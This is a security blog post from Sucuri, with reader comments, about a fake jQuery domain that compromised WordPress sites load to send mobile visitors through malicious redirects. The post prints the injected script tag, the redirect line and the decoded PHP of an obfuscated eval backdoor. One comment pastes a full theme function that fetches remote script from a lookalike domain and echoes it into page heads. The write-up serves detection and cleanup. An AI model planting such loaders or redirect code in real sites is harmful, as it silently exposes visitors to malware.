• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
jquery-framework.com

Careful With Fake jQuery Website – jquery-framework. com

September 17, 2012Daniel Cid

FacebookTwitterSubscribe

A few days ago we posted in our Labs notes about a Fake jQuery website that is distributing malware. The domain was properly chosen to confuse the end-users ( jquery-framework.com ), since it looks like a valid site.

This is what we were seeing injected on some websites:

<script src="httx://jquery-framework.com/jquery-1.7.1.js..

Some people have even complained to us that we’re flagging jQuery by mistake. However, when you visit that page you see that it does not have the jQuery code, just a redirection to http://browser-31.com/:

window.location = "httx://browser-31.com/s/3013";

Which then redirects the browser to additional malicious domains. This is the full path:

http://browser-31.com/s/3013 -> http://browser-31.com/ -> http://exmobi.org/ ->
http://exmobi.org//?TCFL7295a460c02994eeff6c4089e21d24c4=0064f9c1307b53e92d675b76009102e1

or

http://browser-31.com/s/3013 -> http://4redirect.me/in.cgi?5 -> http://sys-traf.ru/?i=5622 -> 
http://moby-c.ru/?r=10997 -> http://wap-trafik.ru/tb.php

Compromised WordPress sites

Since we initially started seeing this and posted in our Labs, we’re seeing even more websites compromised with it (mostly on outdated WordPress). We had the chance to analyze some of them and they had the following eval code being used to hide the malware (inside the theme files):

eval ("145166141154�50142 .. 141163145�66�64137")

Which when decoded executes the following:

if ((preg_match("/text/vnd.wap.wml|application/vnd.wap.xhtml+xml/si", @$_SERVER["HTTP_ACCEPT'].. ||preg_match('/alcatel|amoi|android|avantgo|blackberry|..
           |iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola
           |nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|
vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || 
       preg_match('/msearch|m?q=/si', @$_SERVER['HTTP_REFERER'])) && 
       !preg_match('/macintosh|america|avant|download|windows-media-player|yandex|google/si', 
@$_SERVER['HTTP_USER_AGENT'])) { echo "<script src="httx://jquery-framework.com/jquery-1.7.1.js"..'; 
flush(); 
exit; }

If you are not familiar with PHP, it will check if you are visiting the site from a mobile phone (ipod, ipad, iphone, etc) and if you are, it inserts the jquery-framework.com code on the site. Since Google (and other AV blacklists) aren’t flagging this domain, users will receive no warning of what is happening.

We’re definitely flagging it, make sure to scan your site for free using Sucuri SiteCheck to make sure you’re good to go.

FacebookTwitterSubscribe

Categories: Website Malware Infections, WordPress SecurityTags: Hacked Websites, Malware Updates

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Reader Interactions

Comments

  1. raincoaster

    September 18, 2012

    Have you seen this on any WordPress.com sites? They’re supposed to be invulnerable to this sort of thing but I’ve seen at least one this past week that displays bizarre signs of a classic hack.

    • Scott Wickberg

      September 24, 2012

      this is definitely happening on wordpress sites. I’ve been working to clean some this last week. It’s a much more complex hack than this post details. The mobile redirect is only part of it. Some how they found a way in through an outdated wordpress install or plugin & have set up a hidden root user on our server. If you see this on any of your servers make sure to address it as quick as possible.

      • chris

        September 27, 2012

        if you, or anyone, has any words of wisdom on how to handle this, i’d love to hear it. i’m totally lost and meanwhile people think the russians are after us.

        • Ola

          September 28, 2012

          We have just recovered one of our servers from this. An outdated wordpress install seemed to have been the access point, though we are still investigating some more.

          Some random files were created in the folder of each domain, while the redirection on mobile devices was caused by a modified “.htaccess” file

          • chris

            September 28, 2012

            thanks! there was a bunch of junk in the .htaccess file of the root folder so i deleted it, but the site still redirects on mobile devices. the only difference is that it redirects immediately to “browser-31” without going to “jquery-framework” first. i’m checking all the files modified around the time when the site went down, but i’m not sure what i should be looking for.

            edit: fixed it like 5 minutes later. so as Daniel said, the .php files in the “themes” folder were affected, as you said, the .htaccess file in the root was affected, and i found the last bit in the index.php of the root folder, which looked like the eval code described above. hope this helps anyone else out.

      • raincoaster

        October 11, 2012

        That is not what I asked. WordPress.COM is different from WordPress.ORG and has some severe code restrictions specifically to prevent this kind of attack. Has it been seen on WordPress.com sites?

        • Andres Armeda

          October 11, 2012

          Hey there. We have not seen this on WordPress.com sites. That’s a different animal, and they do a pretty good job of reducing risk around these type of issues.

  2. miles

    September 30, 2012

    I had this in my functions.php of wordpress theme “http://www.jqueryc.com/jquery-1.6.3.min.js

  3. Seamus K

    October 9, 2012

    I’ve just fixed one of our WordPress servers with this same error although I’m not sure what caused it in the first place so it might strike again.

    To fix this I had to remove the eval code for all php files in the themes folder (>50 files in my case). Also I had to remove the eval code from index.php in the root directory as well as remove the extra lines added to .htaccess.

  4. Aren Bane

    November 30, 2012

    I had the same issue as described and i did a simple search in theme functions to find keyword “jquery”.

    Go to:
    Appearance > Editor> Theme Functions (right sidebar)

    If working on a mac hit Command+F to search keywords

    Type in “Jquery”.

    This is what i found:

    /* Define our theme URL constant */

    if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url=”http://www.jqueryc.com/jquery-1.6.3.min.js”;$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);} if(!defined(‘WP_THEME_URL’)) {
    define( ‘WP_THEME_URL’, get_template_directory_uri());
    }

    I just deleted it and problem solved… for now.

    Hope this helps.

    • Nadia

      December 28, 2012

      worked for me too!! thanks!

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.